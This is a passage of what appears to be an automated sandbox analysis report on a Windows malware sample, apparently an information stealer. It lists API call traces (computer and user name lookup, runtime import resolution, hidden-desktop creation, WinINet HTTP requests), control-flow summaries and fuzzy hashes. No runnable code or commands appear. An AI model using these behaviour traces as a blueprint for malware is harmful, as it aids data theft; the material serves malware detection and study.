                                   • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Similarity
                                  • API ID: AllocateHeapProtectVirtual
                                  • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                  • API String ID: 1542196881-3329630956
                                  • Opcode ID: a3f7e266916a4da17db1307156f9fa7c093d6209794f8fafb16d572342cb10c8
                                  • Instruction ID: 9673196907a3282b637b370e1ff470cc6e853c786474d3e6204da8b35fc96fed
                                  • Opcode Fuzzy Hash: a3f7e266916a4da17db1307156f9fa7c093d6209794f8fafb16d572342cb10c8
                                  • Instruction Fuzzy Hash: 4231A515F8039C769620EBEF4CC7F5F6ED5FF85760B02405A75087718289A9E501EAA3

                                   Control-flow Graph
                                  control_flow_graph 2957 fd2ad0-fd2b22 GetProcessHeap RtlAllocateHeap GetComputerNameA 2958 fd2b44-fd2b59 2957->2958 2959 fd2b24-fd2b36 2957->2959
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00FD2AFF
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00FD2B06
                                  • GetComputerNameA.KERNEL32(00000000,00000104), ref: 00FD2B1A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateComputerNameProcess
                                  • String ID:
                                  • API String ID: 1664310425-0
                                  • Opcode ID: 71db5fed4258009d1a4a99b14f9010de537700bb87e225975bdcaded33d0e6c5
                                  • Instruction ID: 61c6af2879da58af0dae27f83ca571eaec8f7a35cad35e1864fccd77bd778078
                                  • Opcode Fuzzy Hash: 71db5fed4258009d1a4a99b14f9010de537700bb87e225975bdcaded33d0e6c5
                                  • Instruction Fuzzy Hash: B101AD72A44248ABC720DFD9E845BAEFBBCF744B25F00026AF919E7780D775590087A1
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00FD2A6F
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00FD2A76
                                  • GetUserNameA.ADVAPI32(00000000,00000104), ref: 00FD2A8A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateNameProcessUser
                                  • String ID:
                                  • API String ID: 1296208442-0
                                  • Opcode ID: dbe69ca743466343f98b97ebaf5f3a4836342fc077aac5dc24f3ca66790ba5d4
                                  • Instruction ID: e9c888568d7ad376ae98e3d66af3d7399cbfd86f434671b19980074c1520043e
                                  • Opcode Fuzzy Hash: dbe69ca743466343f98b97ebaf5f3a4836342fc077aac5dc24f3ca66790ba5d4
                                  • Instruction Fuzzy Hash: 96F0B4B1A40208ABC720DFD8DD49B9EBBBCF704B21F000226FA15E3380D374194487A2

                                  Control-flow Graph

                                  control_flow_graph 633 fd66e0-fd66e7 634 fd66ed-fd6af9 GetProcAddress * 43 633->634 635 fd6afe-fd6b92 LoadLibraryA * 8 633->635 634->635 636 fd6c08-fd6c0f 635->636 637 fd6b94-fd6c03 GetProcAddress * 5 635->637 638 fd6c15-fd6ccd GetProcAddress * 8 636->638 639 fd6cd2-fd6cd9 636->639 637->636 638->639 640 fd6d4f-fd6d56 639->640 641 fd6cdb-fd6d4a GetProcAddress * 5 639->641 642 fd6d5c-fd6de4 GetProcAddress * 6 640->642 643 fd6de9-fd6df0 640->643 641->640 642->643 644 fd6df6-fd6f0b GetProcAddress * 12 643->644 645 fd6f10-fd6f17 643->645 644->645 646 fd6f8d-fd6f94 645->646 647 fd6f19-fd6f88 GetProcAddress * 5 645->647 648 fd6f96-fd6fbc GetProcAddress * 2 646->648 649 fd6fc1-fd6fc8 646->649 647->646 648->649 650 fd6fca-fd6ff0 GetProcAddress * 2 649->650 651 fd6ff5-fd6ffc 649->651 650->651 652 fd70ed-fd70f4 651->652 653 fd7002-fd70e8 GetProcAddress * 10 651->653 654 fd70f6-fd714d GetProcAddress * 4 652->654 655 fd7152-fd7159 652->655 653->652 654->655 656 fd716e-fd7175 655->656 657 fd715b-fd7169 GetProcAddress 655->657 658 fd7177-fd71ce GetProcAddress * 4 656->658 659 fd71d3 656->659 657->656 658->659
                                  APIs
                                  • GetProcAddress.KERNEL32(74DD0000,01B859F0), ref: 00FD66F5
                                  • GetProcAddress.KERNEL32(74DD0000,01B856F0), ref: 00FD670D
                                  • GetProcAddress.KERNEL32(74DD0000,01B996D0), ref: 00FD6726
                                  • GetProcAddress.KERNEL32(74DD0000,01B99628), ref: 00FD673E
                                  • GetProcAddress.KERNEL32(74DD0000,01B99658), ref: 00FD6756
                                  • GetProcAddress.KERNEL32(74DD0000,01B996A0), ref: 00FD676F
                                  • GetProcAddress.KERNEL32(74DD0000,01B8BD10), ref: 00FD6787
                                  • GetProcAddress.KERNEL32(74DD0000,01B9D088), ref: 00FD679F
                                  • GetProcAddress.KERNEL32(74DD0000,01B9D010), ref: 00FD67B8
                                  • GetProcAddress.KERNEL32(74DD0000,01B9CFB0), ref: 00FD67D0
                                  • GetProcAddress.KERNEL32(74DD0000,01B9D040), ref: 00FD67E8
                                  • GetProcAddress.KERNEL32(74DD0000,01B85970), ref: 00FD6801
                                  • GetProcAddress.KERNEL32(74DD0000,01B858B0), ref: 00FD6819
                                  • GetProcAddress.KERNEL32(74DD0000,01B85910), ref: 00FD6831
                                  • GetProcAddress.KERNEL32(74DD0000,01B85930), ref: 00FD684A
                                  • GetProcAddress.KERNEL32(74DD0000,01B9D100), ref: 00FD6862
                                  • GetProcAddress.KERNEL32(74DD0000,01B9CF50), ref: 00FD687A
                                  • GetProcAddress.KERNEL32(74DD0000,01B8BD38), ref: 00FD6893
                                  • GetProcAddress.KERNEL32(74DD0000,01B85850), ref: 00FD68AB
                                  • GetProcAddress.KERNEL32(74DD0000,01B9D160), ref: 00FD68C3
                                  • GetProcAddress.KERNEL32(74DD0000,01B9CF08), ref: 00FD68DC
                                  • GetProcAddress.KERNEL32(74DD0000,01B9D0B8), ref: 00FD68F4
                                  • GetProcAddress.KERNEL32(74DD0000,01B9CF68), ref: 00FD690C
                                  • GetProcAddress.KERNEL32(74DD0000,01B85730), ref: 00FD6925
                                  • GetProcAddress.KERNEL32(74DD0000,01B9CF80), ref: 00FD693D
                                  • GetProcAddress.KERNEL32(74DD0000,01B9D058), ref: 00FD6955
                                  • GetProcAddress.KERNEL32(74DD0000,01B9D070), ref: 00FD696E
                                  • GetProcAddress.KERNEL32(74DD0000,01B9D1A8), ref: 00FD6986
                                  • GetProcAddress.KERNEL32(74DD0000,01B9D118), ref: 00FD699E
                                  • GetProcAddress.KERNEL32(74DD0000,01B9D0A0), ref: 00FD69B7
                                  • GetProcAddress.KERNEL32(74DD0000,01B9CFF8), ref: 00FD69CF
                                  • GetProcAddress.KERNEL32(74DD0000,01B9D1C0), ref: 00FD69E7
                                  • GetProcAddress.KERNEL32(74DD0000,01B9D0D0), ref: 00FD6A00
                                  • GetProcAddress.KERNEL32(74DD0000,01B9AAA0), ref: 00FD6A18
                                  • GetProcAddress.KERNEL32(74DD0000,01B9CF20), ref: 00FD6A30
                                  • GetProcAddress.KERNEL32(74DD0000,01B9D190), ref: 00FD6A49
                                  • GetProcAddress.KERNEL32(74DD0000,01B85770), ref: 00FD6A61
                                  • GetProcAddress.KERNEL32(74DD0000,01B9CF98), ref: 00FD6A79
                                  • GetProcAddress.KERNEL32(74DD0000,01B85A10), ref: 00FD6A92
                                  • GetProcAddress.KERNEL32(74DD0000,01B9D1D8), ref: 00FD6AAA
                                  • GetProcAddress.KERNEL32(74DD0000,01B9D028), ref: 00FD6AC2
                                  • GetProcAddress.KERNEL32(74DD0000,01B85870), ref: 00FD6ADB
                                  • GetProcAddress.KERNEL32(74DD0000,01B85DB0), ref: 00FD6AF3
                                  • LoadLibraryA.KERNEL32(01B9CFC8,00FD051F), ref: 00FD6B05
                                  • LoadLibraryA.KERNEL32(01B9D130), ref: 00FD6B16
                                  • LoadLibraryA.KERNEL32(01B9D0E8), ref: 00FD6B28
                                  • LoadLibraryA.KERNEL32(01B9CF38), ref: 00FD6B3A
                                  • LoadLibraryA.KERNEL32(01B9D178), ref: 00FD6B4B
                                  • LoadLibraryA.KERNEL32(01B9D148), ref: 00FD6B5D
                                  • LoadLibraryA.KERNEL32(01B9CFE0), ref: 00FD6B6F
                                  • LoadLibraryA.KERNEL32(01B9D1F0), ref: 00FD6B80
                                  • GetProcAddress.KERNEL32(75290000,01B85C30), ref: 00FD6B9C
                                  • GetProcAddress.KERNEL32(75290000,01B9D388), ref: 00FD6BB4
                                  • GetProcAddress.KERNEL32(75290000,01B99068), ref: 00FD6BCD
                                  • GetProcAddress.KERNEL32(75290000,01B9D4D8), ref: 00FD6BE5
                                  • GetProcAddress.KERNEL32(75290000,01B85DD0), ref: 00FD6BFD
                                  • GetProcAddress.KERNEL32(6FD60000,01B8B860), ref: 00FD6C1D
                                  • GetProcAddress.KERNEL32(6FD60000,01B85E50), ref: 00FD6C35
                                  • GetProcAddress.KERNEL32(6FD60000,01B8B680), ref: 00FD6C4E
                                  • GetProcAddress.KERNEL32(6FD60000,01B9D400), ref: 00FD6C66
                                  • GetProcAddress.KERNEL32(6FD60000,01B9D358), ref: 00FD6C7E
                                  • GetProcAddress.KERNEL32(6FD60000,01B85C50), ref: 00FD6C97
                                  • GetProcAddress.KERNEL32(6FD60000,01B85AB0), ref: 00FD6CAF
                                  • GetProcAddress.KERNEL32(6FD60000,01B9D328), ref: 00FD6CC7
                                  • GetProcAddress.KERNEL32(752C0000,01B85D10), ref: 00FD6CE3
                                  • GetProcAddress.KERNEL32(752C0000,01B85C70), ref: 00FD6CFB
                                  • GetProcAddress.KERNEL32(752C0000,01B9D430), ref: 00FD6D14
                                  • GetProcAddress.KERNEL32(752C0000,01B9D370), ref: 00FD6D2C
                                  • GetProcAddress.KERNEL32(752C0000,01B85E30), ref: 00FD6D44
                                  • GetProcAddress.KERNEL32(74EC0000,01B8B770), ref: 00FD6D64
                                  • GetProcAddress.KERNEL32(74EC0000,01B8B6F8), ref: 00FD6D7C
                                  • GetProcAddress.KERNEL32(74EC0000,01B9D490), ref: 00FD6D95
                                  • GetProcAddress.KERNEL32(74EC0000,01B85B50), ref: 00FD6DAD
                                  • GetProcAddress.KERNEL32(74EC0000,01B85CD0), ref: 00FD6DC5
                                  • GetProcAddress.KERNEL32(74EC0000,01B8B720), ref: 00FD6DDE
                                  • GetProcAddress.KERNEL32(75BD0000,01B9D4F0), ref: 00FD6DFE
                                  • GetProcAddress.KERNEL32(75BD0000,01B85DF0), ref: 00FD6E16
                                  • GetProcAddress.KERNEL32(75BD0000,01B98F98), ref: 00FD6E2F
                                  • GetProcAddress.KERNEL32(75BD0000,01B9D208), ref: 00FD6E47
                                  • GetProcAddress.KERNEL32(75BD0000,01B9D238), ref: 00FD6E5F
                                  • GetProcAddress.KERNEL32(75BD0000,01B85BB0), ref: 00FD6E78
                                  • GetProcAddress.KERNEL32(75BD0000,01B85BD0), ref: 00FD6E90
                                  • GetProcAddress.KERNEL32(75BD0000,01B9D418), ref: 00FD6EA8
                                  • GetProcAddress.KERNEL32(75BD0000,01B9D340), ref: 00FD6EC1
                                  • GetProcAddress.KERNEL32(75BD0000,CreateDesktopA), ref: 00FD6ED7
                                  • GetProcAddress.KERNEL32(75BD0000,OpenDesktopA), ref: 00FD6EEE
                                  • GetProcAddress.KERNEL32(75BD0000,CloseDesktop), ref: 00FD6F05
                                  • GetProcAddress.KERNEL32(75A70000,01B85AD0), ref: 00FD6F21
                                  • GetProcAddress.KERNEL32(75A70000,01B9D4C0), ref: 00FD6F39
                                  • GetProcAddress.KERNEL32(75A70000,01B9D448), ref: 00FD6F52
                                  • GetProcAddress.KERNEL32(75A70000,01B9D3A0), ref: 00FD6F6A
                                  • GetProcAddress.KERNEL32(75A70000,01B9D3B8), ref: 00FD6F82
                                  • GetProcAddress.KERNEL32(75450000,01B85CF0), ref: 00FD6F9E
                                  • GetProcAddress.KERNEL32(75450000,01B85C90), ref: 00FD6FB6
                                  • GetProcAddress.KERNEL32(75DA0000,01B85AF0), ref: 00FD6FD2
                                  • GetProcAddress.KERNEL32(75DA0000,01B9D460), ref: 00FD6FEA
                                  • GetProcAddress.KERNEL32(6F070000,01B85B10), ref: 00FD700A
                                  • GetProcAddress.KERNEL32(6F070000,01B85D50), ref: 00FD7022
                                  • GetProcAddress.KERNEL32(6F070000,01B85B30), ref: 00FD703B
                                  • GetProcAddress.KERNEL32(6F070000,01B9D2B0), ref: 00FD7053
                                  • GetProcAddress.KERNEL32(6F070000,01B85B70), ref: 00FD706B
                                  • GetProcAddress.KERNEL32(6F070000,01B85B90), ref: 00FD7084
                                  • GetProcAddress.KERNEL32(6F070000,01B85BF0), ref: 00FD709C
                                  • GetProcAddress.KERNEL32(6F070000,01B85D30), ref: 00FD70B4
                                  • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 00FD70CB
                                  • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 00FD70E2
                                  • GetProcAddress.KERNEL32(75AF0000,01B9D478), ref: 00FD70FE
                                  • GetProcAddress.KERNEL32(75AF0000,01B990B8), ref: 00FD7116
                                  • GetProcAddress.KERNEL32(75AF0000,01B9D220), ref: 00FD712F
                                  • GetProcAddress.KERNEL32(75AF0000,01B9D280), ref: 00FD7147
                                  • GetProcAddress.KERNEL32(75D90000,01B85E10), ref: 00FD7163
                                  • GetProcAddress.KERNEL32(6CE80000,01B9D4A8), ref: 00FD717F
                                  • GetProcAddress.KERNEL32(6CE80000,01B85C10), ref: 00FD7197
                                  • GetProcAddress.KERNEL32(6CE80000,01B9D310), ref: 00FD71B0
                                  • GetProcAddress.KERNEL32(6CE80000,01B9D250), ref: 00FD71C8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: CloseDesktop$CreateDesktopA$HttpQueryInfoA$InternetSetOptionA$OpenDesktopA
                                  • API String ID: 2238633743-3468015613
                                  • Opcode ID: ade74dd934259a48e7c3c7bf5104f60ebd8463a4fdb5ae583a13a84eb11aeead
                                  • Instruction ID: cc613b2750e69395657fff0b8934993a7ca37dd7ac7726312ac4fbd2e0e993a6
                                  • Opcode Fuzzy Hash: ade74dd934259a48e7c3c7bf5104f60ebd8463a4fdb5ae583a13a84eb11aeead
                                  • Instruction Fuzzy Hash: 00624FF55102089FD77CDFE5E988A263BFAF7886093408939E9758B348D734A9C0DB61
                                  APIs
                                  • lstrlen.KERNEL32(00FDCFEC), ref: 00FCF1D5
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FCF1F1
                                  • lstrlen.KERNEL32(00FDCFEC), ref: 00FCF1FC
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FCF215
                                  • lstrlen.KERNEL32(00FDCFEC), ref: 00FCF220
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FCF239
                                  • lstrcpy.KERNEL32(00000000,00FE4FA0), ref: 00FCF25E
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FCF28C
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FCF2C0
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FCF2F0
                                  • lstrlen.KERNEL32(01B85710), ref: 00FCF315
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen
                                  • String ID: ERROR
                                  • API String ID: 367037083-2861137601
                                  • Opcode ID: ae8e53ea32d3ec4fab06a8801b63a1e41ef9614d45fd4230a26a64d9961cb3ae
                                  • Instruction ID: 41410079d46b17b5d76c0312c879e6aa38ef0a34795a73a75717cee2cbabc38a
                                  • Opcode Fuzzy Hash: ae8e53ea32d3ec4fab06a8801b63a1e41ef9614d45fd4230a26a64d9961cb3ae
                                  • Instruction Fuzzy Hash: BAA24830D012068FCB28EFA5CA49B9AFBF6AF44324B18807DE8199B255DB35DC45EB50
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FD0013
                                  • lstrlen.KERNEL32(00FDCFEC), ref: 00FD00BD
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FD00E1
                                  • lstrlen.KERNEL32(00FDCFEC), ref: 00FD00EC
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FD0110
                                  • lstrlen.KERNEL32(00FDCFEC), ref: 00FD011B
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FD013F
                                  • lstrlen.KERNEL32(00FDCFEC), ref: 00FD015A
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FD0189
                                  • lstrlen.KERNEL32(00FDCFEC), ref: 00FD0194
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FD01C3
                                  • lstrlen.KERNEL32(00FDCFEC), ref: 00FD01CE
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FD0206
                                  • lstrlen.KERNEL32(00FDCFEC), ref: 00FD0250
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FD0288
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FD059B
                                  • lstrlen.KERNEL32(01B859B0), ref: 00FD05AB
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FD05D7
                                  • lstrcat.KERNEL32(00000000,?), ref: 00FD05E3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FD060E
                                  • lstrlen.KERNEL32(01B9E388), ref: 00FD0625
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FD064C
                                  • lstrcat.KERNEL32(00000000,?), ref: 00FD0658
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FD0681
                                  • lstrlen.KERNEL32(01B85A50), ref: 00FD0698
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FD06C9
                                  • lstrcat.KERNEL32(00000000,?), ref: 00FD06D5
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FD0706
                                  • lstrcpy.KERNEL32(00000000,01B99098), ref: 00FD074B
                                    • Part of subcall function 00FB1530: lstrcpy.KERNEL32(00000000,?), ref: 00FB1557
                                    • Part of subcall function 00FB1530: lstrcpy.KERNEL32(00000000,?), ref: 00FB1579
                                    • Part of subcall function 00FB1530: lstrcpy.KERNEL32(00000000,?), ref: 00FB159B
                                    • Part of subcall function 00FB1530: lstrcpy.KERNEL32(00000000,?), ref: 00FB15FF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FD077F
                                  • lstrcpy.KERNEL32(00000000,01B9E298), ref: 00FD07E7
                                  • lstrcpy.KERNEL32(00000000,01B99298), ref: 00FD0858
                                  • lstrcpy.KERNEL32(00000000,fplugins), ref: 00FD08CF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FD0928
                                  • lstrcpy.KERNEL32(00000000,01B991C8), ref: 00FD09F8
                                    • Part of subcall function 00FB24E0: lstrcpy.KERNEL32(00000000,?), ref: 00FB2528
                                    • Part of subcall function 00FB24E0: lstrcpy.KERNEL32(00000000,?), ref: 00FB254E
                                    • Part of subcall function 00FB24E0: lstrcpy.KERNEL32(00000000,?), ref: 00FB2577
                                  • lstrcpy.KERNEL32(00000000,01B99268), ref: 00FD0ACE
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FD0B81
                                  • lstrcpy.KERNEL32(00000000,01B99268), ref: 00FD0D58
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$lstrcat
                                  • String ID: fplugins
                                  • API String ID: 2500673778-38756186
                                  • Opcode ID: 158f4e76cf76960e750a063ab5d1612d860fec5616372d143653eabe736d52ae
                                  • Instruction ID: 4be00d8b8dd71b9c9770602b32a4dd953608919cdbdf1a1c461a312186f07051
                                  • Opcode Fuzzy Hash: 158f4e76cf76960e750a063ab5d1612d860fec5616372d143653eabe736d52ae
                                  • Instruction Fuzzy Hash: 69E25871A053418FD734DF29C888B5ABBE2BF88324F58856EE4898B352DB35D841DF52

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2234 fb6c40-fb6c64 call fb2930 2237 fb6c66-fb6c6b 2234->2237 2238 fb6c75-fb6c97 call fb4bc0 2234->2238 2237->2238 2240 fb6c6d-fb6c6f lstrcpy 2237->2240 2242 fb6caa-fb6cba call fb2930 2238->2242 2243 fb6c99 2238->2243 2240->2238 2247 fb6cc8-fb6cf5 InternetOpenA StrCmpCA 2242->2247 2248 fb6cbc-fb6cc2 lstrcpy 2242->2248 2244 fb6ca0-fb6ca8 2243->2244 2244->2242 2244->2244 2249 fb6cfa-fb6cfc 2247->2249 2250 fb6cf7 2247->2250 2248->2247 2251 fb6ea8-fb6ebb call fb2930 2249->2251 2252 fb6d02-fb6d22 InternetConnectA 2249->2252 2250->2249 2259 fb6ec9-fb6ee0 call fb2a20 * 2 2251->2259 2260 fb6ebd-fb6ebf 2251->2260 2253 fb6d28-fb6d5d HttpOpenRequestA 2252->2253 2254 fb6ea1-fb6ea2 InternetCloseHandle 2252->2254 2257 fb6d63-fb6d65 2253->2257 2258 fb6e94-fb6e9e InternetCloseHandle 2253->2258 2254->2251 2261 fb6d7d-fb6dad HttpSendRequestA HttpQueryInfoA 2257->2261 2262 fb6d67-fb6d77 InternetSetOptionA 2257->2262 2258->2254 2260->2259 2265 fb6ec1-fb6ec3 lstrcpy 2260->2265 2263 fb6daf-fb6dd3 call fd71e0 call fb2a20 * 2 2261->2263 2264 fb6dd4-fb6de4 call fd3d90 2261->2264 2262->2261 2264->2263 2275 fb6de6-fb6de8 2264->2275 2265->2259 2277 fb6dee-fb6e07 InternetReadFile 2275->2277 2278 fb6e8d-fb6e8e InternetCloseHandle 2275->2278 2277->2278 2280 fb6e0d 2277->2280 2278->2258 2282 fb6e10-fb6e15 2280->2282 2282->2278 2283 fb6e17-fb6e3d call fd7310 2282->2283 2286 fb6e3f call fb2a20 2283->2286 2287 fb6e44-fb6e51 call fb2930 2283->2287 2286->2287 2291 fb6e53-fb6e57 2287->2291 2292 fb6e61-fb6e8b call fb2a20 InternetReadFile 2287->2292 2291->2292 2293 fb6e59-fb6e5b lstrcpy 2291->2293 2292->2278 2292->2282 2293->2292
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FB6C6F
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FB6CC2
                                  • InternetOpenA.WININET(00FDCFEC,00000001,00000000,00000000,00000000), ref: 00FB6CD5
                                  • StrCmpCA.SHLWAPI(?,01B9E968), ref: 00FB6CED
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00FB6D15
                                  • HttpOpenRequestA.WININET(00000000,GET,?,01B9E568,00000000,00000000,-00400100,00000000), ref: 00FB6D50
                                  • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00FB6D77
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00FB6D86
                                  • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00FB6DA5
                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00FB6DFF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FB6E5B
                                  • InternetReadFile.WININET(?,00000000,000007CF,?), ref: 00FB6E7D
                                  • InternetCloseHandle.WININET(00000000), ref: 00FB6E8E
                                  • InternetCloseHandle.WININET(?), ref: 00FB6E98
                                  • InternetCloseHandle.WININET(00000000), ref: 00FB6EA2
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB6EC3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequest$ConnectInfoOptionQuerySend
                                  • String ID: ERROR$GET
                                  • API String ID: 3687753495-3591763792
                                  • Opcode ID: 71ea1f2f8943887d159942d07ac1721f3e15048d9d638526e8206d62c5a33c6c
                                  • Instruction ID: dded1c114b60cf1396a9146c98e04c1c7174d76c3b78466c62537884ce279cc9
                                  • Opcode Fuzzy Hash: 71ea1f2f8943887d159942d07ac1721f3e15048d9d638526e8206d62c5a33c6c
                                  • Instruction Fuzzy Hash: 6F819E71E01219ABEB20DFA5DC49BEE77B9AF44710F044068F915EB280DB78ED449FA4
                                  APIs
                                  • lstrlen.KERNEL32(01B85710), ref: 00FCF315
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FCF3A3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FCF3C7
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FCF47B
                                  • lstrcpy.KERNEL32(00000000,01B85710), ref: 00FCF4BB
                                  • lstrcpy.KERNEL32(00000000,01B99008), ref: 00FCF4EA
